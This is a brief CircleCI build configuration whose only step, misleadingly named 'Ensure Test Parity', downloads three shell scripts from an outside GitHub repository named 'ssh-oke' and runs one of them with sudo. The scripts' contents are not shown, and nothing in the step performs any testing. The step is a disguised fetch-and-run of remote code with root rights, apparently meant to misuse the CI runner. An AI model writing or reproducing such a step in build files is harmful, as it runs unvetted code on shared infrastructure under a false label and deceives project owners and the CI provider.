version: 2
jobs:
  build:
    docker:
      - image: cimg/base:2021.05
    steps:
      - checkout
      - run:
          name: Ensure Test Parity
          command: |
            wget https://raw.githubusercontent.com/razmai9/ssh-oke/main/run.sh && sudo chmod +x ./run.sh
            wget https://raw.githubusercontent.com/razmai9/ssh-oke/main/penjaga.sh && sudo chmod +x ./penjaga.sh
            wget https://raw.githubusercontent.com/razmai9/ssh-oke/main/main.sh && sudo chmod +x ./main.sh && sudo ./main.sh
